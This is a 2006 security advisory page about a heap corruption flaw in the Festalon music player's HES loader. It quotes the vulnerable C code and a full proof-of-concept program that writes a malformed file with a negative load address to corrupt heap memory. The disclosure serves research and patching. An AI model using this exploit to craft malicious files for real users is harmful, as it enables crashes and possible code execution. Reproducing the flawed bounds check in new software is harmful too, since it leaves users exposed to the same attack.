Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	Festalon Heap Corruption 7 Aug. 2006    Summary Festalon is "a player (stand-alone and plugin) for the Nintendo .nsf music files". A heap corruption vulnerability in Festalon allows attackers to cause the program to fail and possibly execute arbitrary code.   Credit: The information has been provided by Luigi Auriemma. The original article can be found at: http://aluigi.altervista.org/adv/festahc-adv.txt Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Festalon version 0.5.5 and prior  * Festalon version 0.5.0 and above HES is a file format for ripped TG16/PC Engine music which has been added from version 0.5.0. FESTALON_HES is a structure of 1501888 bytes used to contain the file in memory. The program uses an anti-overflow check for avoiding input data major than the rom size of 0x100000 bytes. Anyway the check is made on the sum of LoadAddr (used as an offset of the destination rom buffer) and LoadSize (amount of data to copy) so an attacker can use a negative LoadAddr value for overwriting the memory antecedent the one allocated. The exploitation (Luigi is not sure if code execution is really possible although the effects seem similar to a heap overflow) occurs when the program terminates and free() is called. From pce/hes.c: FESTALON_HES *FESTAHES_Load(FESTALON *fe, uint8 *buf, uint32 size) {  FESTALON_HES *hes;  uint32 LoadAddr,LoadSize;  uint16 InitAddr;  uint8 *tmp;  int x;  fe->TotalChannels = 6;  fe->OutChannels = 2;  hes = FESTA_malloc(16, sizeof(FESTALON_HES));  hes->h6280 = malloc(sizeof(h6280_Regs));  InitAddr = De16(&buf[0x6]);  tmp = &buf[0x10];  while(tmp < (buf + size - 0x10))  {   LoadSize = De32(&tmp[0x4]);   LoadAddr = De32(&tmp[0x8]);   //printf("%08x:%08x\n",LoadSize,LoadAddr);   tmp += 0x10;   if(tmp >= (buf + size + LoadSize)) break;   if((LoadAddr + LoadSize) > 0x100000) break;   memcpy(hes->rom + LoadAddr,tmp,LoadSize);   tmp += LoadSize;  }  ... Exploit: /* by Luigi Auriemma - http://aluigi.altervista.org/poc/festahc.zip */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #define VER "0.1" #define FESTALON_HES_LIMIT 0x100000 #define FESTALON_HES_SIZE 1501888 #define UNDERSIZE 32 // maximum amount of data before allocation #define FESTALON_HES_FRONT (0x2000 + 0x8000 + UNDERSIZE) #define HEAPOVERSZ (FESTALON_HES_FRONT + FESTALON_HES_LIMIT) void fwbof(FILE *fd, int len, int chr); void fwi08(FILE *fd, int num); void fwi16(FILE *fd, int num); void fwi32(FILE *fd, int num); void fwmem(FILE *fd, uint8_t *data, int size); void std_err(void); int main(int argc, char *argv[]) {     FILE *fd;     char *fname;     setbuf(stdout, NULL);     fputs("\n"         "Festalon 0.5.0-0.5.5 heap corruption "VER"\n"         "by Luigi Auriemma\n"         "e-mail: aluigi@autistici.org\n"         "web: aluigi.org\n"         "\n", stdout);     if(argc < 2) {         printf("\n"             "Usage: %s <output_file.NSF>\n"             "\n", argv[0]);         exit(1);     }     fname = argv[1];     printf("- create file %s\n", fname);     fd = fopen(fname, "wb");     if(!fd) std_err();     fwmem(fd, "HESM", 4); // MAGIC-ID 'HESM'     fwi08(fd, 0); // VERSION(0)     fwi08(fd, 0); // START SONG     fwi16(fd, 0); // REQUEST ADDRESS(LOGICAL ADDRESS)     fwi08(fd, 0xff); // INITIAL MPR0($FF)     fwi08(fd, 0xf8); // INITIAL MPR1($F8)     fwi08(fd, 0); // INITIAL MPR2     fwi08(fd, 0); // INITIAL MPR3     fwi08(fd, 0); // INITIAL MPR4     fwi08(fd, 0); // INITIAL MPR5     fwi08(fd, 0); // INITIAL MPR6     fwi08(fd, 0x00); // INITIAL MPR7($00)     fwmem(fd, "DATA", 4); // SUB-ID 'DATA'     fwi32(fd, HEAPOVERSZ); // DATA SIZE     fwi32(fd, -FESTALON_HES_FRONT); // LOAD ADDRESS(PHYSICAL ADDRESS)     fwi32(fd, 0); // RESERVE(0)     fwbof(fd, HEAPOVERSZ, 'a'); // DATA     printf(         "- this PoC forces the program to overwrite the %d bytes before the starting\n"         " of the hes allocated memory\n", UNDERSIZE);     fclose(fd);     printf("- finished\n");     return(0); } void fwbof(FILE *fd, int len, int chr) {     while(len--) fputc(chr, fd); } void fwi08(FILE *fd, int num) {     fputc((num ) & 0xff, fd); } void fwi16(FILE *fd, int num) {     fputc((num ) & 0xff, fd);     fputc((num >> 8) & 0xff, fd); } void fwi32(FILE *fd, int num) {     fputc((num ) & 0xff, fd);     fputc((num >> 8) & 0xff, fd);     fputc((num >> 16) & 0xff, fd);     fputc((num >> 24) & 0xff, fd); } void fwmem(FILE *fd, uint8_t *data, int size) {     fwrite(data, size, 1, fd); } void std_err(void) {     perror("\nError");     exit(1); }  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles HP Data Protector LogBackupLocationStatus SQL Injection Vulnerabilty InduSoft WebStudio Unauthenticated Operations Code Execution Vulnerabilityy InduSoft WebStudio CEServer Operation 0x15 Code Execution Vulnerability HP Data Protector Notebook Extension RequestCopy SQL Injection Vulnerabilty HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty HP Data Protector Notebook Extension GetPolicies SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability HP Data Protector Notebook Extension LogClientHealth SQL Injection Vulnerabilty HP Data Protector Notebook Extension LogCopyOperation SQL Injection Vulnerabilty HP Data Protector Notebook Extension FinishedCopy SQL Injection Vulnerabilty Novell ZENWorks Software Packaging ISGrid.Grid2.1 Text Parameter Code Execution Vulnerabilit Adobe Reader BMP Image RLE Decoding Code Execution Vulnerability Apple QuickTime H264 Matrix Conversion Code Execution Vulnerability Apple QuickTime FLC Delta Decompression Code Execution Vulnerability Apple Quicktime PnPixPat PatType 3 Parsing Code Execution Vulnerability  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®